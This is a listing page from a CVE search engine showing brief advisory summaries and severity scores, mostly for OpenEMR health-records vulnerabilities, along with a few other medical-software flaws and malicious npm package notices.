CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

188 matches found

NVD•added 2026/03/26 12:16 a.m.•3 views

CVE-2026-33918

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.3, the billing file-download endpoint interface/billing/getclaimfile.php only verifies that the caller has a valid session and CSRF token, but does not check any ACL...

8.8CVSS0.00244EPSS

Exploits0References3

ATTACKERKB•added 2026/03/18 3:28 p.m.•3 views

CVE-2026-2991

The KiviCare – Clinic & Patient Management System EHR plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 4.1.2. This is due to the patientSocialLogin function not verifying the social provider access token before authenticating a user. This makes it...

9.8CVSS5.9AI score0.00434EPSS

Exploits1References5

Positive Technologies•added 2026/03/03 12:0 a.m.•6 views

PT-2026-22835

Name of the Vulnerable Software and Affected Versions OpenEMR versions prior to 8.0.0 Description OpenEMR is an electronic health records and medical practice management application. A flaw in the MedEx callback endpoint allows unauthenticated access to the practice's MedEx API tokens. This can...

10CVSS5.9AI score0.00555EPSS

Exploits1References7

NVD•added 2026/02/25 7:43 p.m.•6 views

CVE-2026-24908

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an SQL injection vulnerability in the Patient REST API endpoint allows authenticated users with API access to execute arbitrary SQL queries through the sort parameter...

9.9CVSS0.00491EPSS

Exploits1References2

NVD•added 2026/02/25 7:43 p.m.•9 views

CVE-2026-24487

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an authorization bypass vulnerability in the FHIR CareTeam resource endpoint allows patient-scoped FHIR tokens to access care team data for all patients instead of bein...

7.1CVSS0.00266EPSS

Exploits1References2

EUVD•added 2026/02/25 6:14 p.m.•4 views

EUVD-2026-8703

9.9CVSS6.1AI score0.00491EPSS

Exploits1References2

ATTACKERKB•added 2026/02/25 5:45 p.m.•2 views

CVE-2026-24487

7.1CVSS5.8AI score0.00266EPSS

Exploits1References3Affected Software1

Cvelist•added 2026/02/25 5:39 p.m.•22 views

CVE-2026-23627 OpenEMR has SQL Injection in Immunization Search/Report

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an SQL injection vulnerability in the Immunization module allows any authenticated user to execute arbitrary SQL queries, leading to complete database compromise, PHI...

8.7CVSS0.00779EPSS

Exploits1References2

EUVD•added 2026/02/25 5:39 p.m.•5 views

EUVD-2026-8700

8.7CVSS6.6AI score0.00779EPSS

Exploits1References2

Positive Technologies•added 2026/02/25 12:0 a.m.•5 views

PT-2026-21974

Name of the Vulnerable Software and Affected Versions OpenEMR versions prior to 8.0.0 Description OpenEMR is an electronic health records and medical practice management application. A flaw exists in the Patient REST API endpoint where an authenticated user with API access can execute arbitrary S...

9.9CVSS5.8AI score0.00491EPSS

Exploits1References7

Positive Technologies•added 2026/02/25 12:0 a.m.•5 views

PT-2026-21971

Name of the Vulnerable Software and Affected Versions OpenEMR versions prior to 8.0.0 Description OpenEMR is an electronic health records and medical practice management application. A flaw exists where patient-scoped FHIR tokens can access care team data for all patients instead of being limited...

7.1CVSS5.1AI score0.00266EPSS

Exploits1References6

Packet Storm News•added 2026/02/24 12:0 a.m.•5 views

Analysis of LLMs against Prompt Injection and Jailbreak Attacks

Large Language Models LLMs are widely deployed in real-world systems. Given their broader applicability, prompt engineering has become an efficient tool for resource-scarce organizations to adopt LLMs for their own purposes. At the same time, LLMs are vulnerable to prompt-based attacks. Thus,...

6AI score

Exploits0

RedhatCVE•added 2026/01/09 9:55 a.m.•7 views

CVE-2020-12032

Baxter ExactaMix EM 2400 Versions 1.10, 1.11 and ExactaMix EM1200 Versions 1.1, 1.2 systems store device data with sensitive information in an unencrypted database. This could allow an attacker with network access to view or modify sensitive data including PHI...

9.1CVSS6.5AI score0.00941EPSS

Exploits0References1

EUVD•added 2025/11/13 3:23 a.m.•5 views

EUVD-2025-178428

Malicious code in index-short-java-phi-virtualize npm...

6.6AI score

Exploits0

EUVD•added 2025/11/13 3:23 a.m.•1 views

EUVD-2025-175961

Malicious code in theta-air-char-import-phi npm...

6.6AI score

Exploits0